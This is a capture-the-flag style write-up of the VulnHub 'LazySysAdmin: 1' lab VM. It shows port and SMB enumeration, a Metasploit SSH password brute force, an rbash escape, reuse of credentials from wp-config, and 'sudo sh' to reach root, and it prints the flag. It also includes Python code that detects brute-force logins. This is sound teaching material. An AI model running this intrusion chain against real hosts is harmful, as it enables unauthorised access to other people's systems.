Back once again with another vulnhub writeup; you guys seem to like these, and a load of new VMs were added that currently don't have any.
As you can tell by the title this one is for “LazySysAdmin: 1”
My setup is as follows:
Attacker: 192.168.1.135
Target: 192.168.1.142
Firstly I did a portscan, this revealed the following:
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
6667/tcp open irc syn-ack ttl 64 InspIRCd
Being a web guy, the first thing I did was load up a browser and Burp Suite and browse the site. Not much of interest was there, so I launched Nikto and dirb.
These found some folders that had directory listing enabled, but no useful content.
/info.php contained phpinfo();
/wordpress/ had a wordpress blog
/phpmyadmin/ contained phpmyadmin
I then fired wpscan against /wordpress/ with nothing useful found except a username of “admin”.
I then ran enum4linux against the box which revealed the following:
Looking up status of 192.168.1.142
LAZYSYSADMIN <00> - B Workstation Service
LAZYSYSADMIN <03> - B Messenger Service
LAZYSYSADMIN <20> - B File Server Service
WORKGROUP <00> - B Domain/Workgroup Name
WORKGROUP <1e> - B Browser Service Elections
[+] Got OS info for 192.168.1.142 from srvinfo:
LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
platform_id : 500
os version : 6.1
server type : 0x809a03
//192.168.1.142/print$ Mapping: DENIED, Listing: N/A
//192.168.1.142/share$ Mapping: OK, Listing: OK
//192.168.1.142/IPC$ Mapping: OK Listing: DENIED
S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
S-1-22-1-1000 Unix User\togie (Local User)
The most useful thing here is the local username "togie".
On a hunch I decided to try to bruteforce the SSH service with this username:
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.142
RHOSTS => 192.168.1.142
msf auxiliary(ssh_login) > set USERNAME togie
USERNAME => togie
msf auxiliary(ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(ssh_login) > set PASS_FILE /opt/wordlists/rockyou.txt
PASS_FILE => /opt/wordlists/rockyou.txt
msf auxiliary(ssh_login) > run
[+] 192.168.1.142:22 - Success: 'togie:12345' 'uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux '
[*] 192.168.1.142 - Command shell session 1 closed. Reason: Died from EOFError
[*] Command shell session 1 opened (192.168.1.135:36709 -> 192.168.1.142:22) at 2017-10-05 16:09:05 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
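The success line above is what the guessing run looks like from the attacker's side; on the target it leaves a burst of sshd "Failed password" entries followed by an "Accepted password" for the same user and source in auth.log. The Python below is an added example (not part of the original writeup) that flags exactly that pattern over constructed log lines; the sample lines, the five-failure threshold and the five-minute window are my assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth.log sample (not from the writeup): five failures for one user from one source, then a success.
SAMPLE_LOG = """\
Oct  5 16:08:51 LazySysAdmin sshd[2201]: Failed password for togie from 192.168.1.135 port 36701 ssh2
Oct  5 16:08:52 LazySysAdmin sshd[2203]: Failed password for togie from 192.168.1.135 port 36702 ssh2
Oct  5 16:08:53 LazySysAdmin sshd[2205]: Failed password for togie from 192.168.1.135 port 36703 ssh2
Oct  5 16:08:54 LazySysAdmin sshd[2207]: Failed password for togie from 192.168.1.135 port 36704 ssh2
Oct  5 16:08:55 LazySysAdmin sshd[2209]: Failed password for togie from 192.168.1.135 port 36705 ssh2
Oct  5 16:09:05 LazySysAdmin sshd[2211]: Accepted password for togie from 192.168.1.135 port 36709 ssh2
Oct  5 16:20:00 LazySysAdmin sshd[2300]: Accepted publickey for admin from 192.168.1.10 port 50000 ssh2
"""

# One pattern for both "Failed password" and "Accepted password/publickey" sshd lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse(line, year=2017):
    # syslog timestamps carry no year; the caller supplies one (the constructed sample is from 2017).
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def find_bruteforce_logins(log_text, threshold=5, window_s=300):
    """Return (src, user, failures) for every accepted login that was preceded by
    at least `threshold` failures from the same source within `window_s` seconds."""
    failures = defaultdict(list)  # (src, user) -> timestamps of recent failures
    hits = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        key = (src, user)
        # Keep only failures that fall inside the sliding window ending at this event.
        failures[key] = [t for t in failures[key] if (ts - t).total_seconds() <= window_s]
        if result == "Failed":
            failures[key].append(ts)
        elif len(failures[key]) >= threshold:
            hits.append((src, user, len(failures[key])))
            failures[key].clear()
    return hits
```

Running find_bruteforce_logins(SAMPLE_LOG) reports the togie login from 192.168.1.135 after 5 failures and stays silent on the key-based admin login.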
Well, that was easy! After SSHing in it quickly became apparent that I was in a restricted "rbash" shell. This was trivial to break out of:
togie@LazySysAdmin:~$ cd ..
-rbash: cd: restricted
togie@LazySysAdmin:~$ bash
togie@LazySysAdmin:~$ cd ..
togie@LazySysAdmin:/home$
From there I was able to read the wp-config.php file and gain access to phpmyadmin and wordpress (both used the same credentials). There were some other files of note in the webroot which I really should have found earlier!
Time to get root. I fired up "python -m SimpleHTTPServer" on my attacker VM and, over the SSH session on the victim, downloaded linuxprivchecker.py and LinEnum.sh.
After running them it quickly became apparent that the user had sudo privileges (togie is in the sudo group, as the id output above shows). A quick "sudo sh" and voilà, I was root. cd to /root and see proof.txt:
root@LazySysAdmin:~# cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ #PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ #PT9851
2d2v #X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
All in all this was a fun boot2root, thanks @togiemcdogie.